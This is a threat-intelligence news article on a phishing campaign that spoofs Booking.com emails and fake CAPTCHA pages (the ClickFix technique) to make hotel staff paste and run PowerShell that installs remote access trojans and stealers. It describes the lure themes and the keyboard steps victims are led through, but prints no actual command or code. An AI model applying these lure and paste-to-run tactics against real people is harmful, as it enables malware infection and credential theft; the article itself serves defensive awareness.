Booking.com Spoofed in ClickFix Malware Surge Targeting Hotels and Travel Sector
Ddos 
An attack chain diagram for a typical sample in this campaign | Image: Cofense
According to Cofense Intelligence, a sophisticated and evolving phishing campaign is using spoofed Booking.com emails and fake CAPTCHA websitesβa technique known as ClickFixβto deliver remote access trojans (RATs) and information stealers to hotel and travel industry victims.
The campaign, active since November 2024, has grown rapidly, with 47% of its total activity peaking in March 2025 alone. Cofense reports:
βThese campaigns are notable for delivering a wide variety of remote access trojans (RATs) or information stealers via an embedded link to a fake CAPTCHA site that delivers a malicious script instead of a verification code.β
The attack tricks recipients into executing a PowerShell command disguised as a CAPTCHA verification. Known as ClickFix, this technique leverages Windows keyboard shortcuts to paste and execute scripts without requiring file downloads.
The email lures are carefully tailored to exploit the pressure and professionalism of hotel staff. Examples include:
- Vague “incident reports” directed to unnamed “partners”
- Fake guest complaints implying reputational damage and threatening 24-hour deadlines
- Fabricated booking confirmations with guest names and specific requests
These psychological manipulations urge recipients to click embedded linksβredirecting them to ClickFix payloads.
β75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates,β Cofense notes.
The malware delivered via these campaigns includes:
- XWorm RAT β The most common payload, seen in 53% of attacks
- Pure Logs Stealer β Present in 19% of samples
- DanaBot β Seen in 14%
- ConnectWise RAT β In select campaigns
Some samples deliver multiple payloads simultaneously. Cofense highlights: β11% of campaign ATRs were seen delivering both RATs and information stealers.β
These threats enable remote system access, credential theft, and data exfiltration across compromised endpoints.
ClickFix payloads use clever JavaScript to place a PowerShell script in the userβs clipboard, then instruct the victim to:
- Press Windows Key + R
- Press Ctrl + V (to paste the script)
- Hit Enter to execute
To make the script look innocuous, attackers append fake verification codes as comments at the end of the script. For example:
βWhen pasted into a Run command window… only the commentβs βverification codeβ is visible,β explains Cofense.
While Booking.com-themed fake CAPTCHAs dominate, new variations have emerged:
- Cloudflare Turnstile-spoofing templates
- Cookie consent banner-themed ClickFix sites prompting script execution under the guise of βAccepting cookiesβ
These evolving tactics indicate that attackers are actively testing new pretexts to broaden their target base.
As attackers continue to innovate with ClickFix and RAT-laden phishing campaigns, the best defense is proactive user awareness and layered endpoint protections.
Related Posts:
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Travelers Targeted: Booking.com Phishing Scam Unveiled
- Booking.com Impersonated in Phishing Campaign Delivering Credential-Stealing Malware
- Booking.com Impersonation Campaign: Agent Tesla Malware Analysis
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
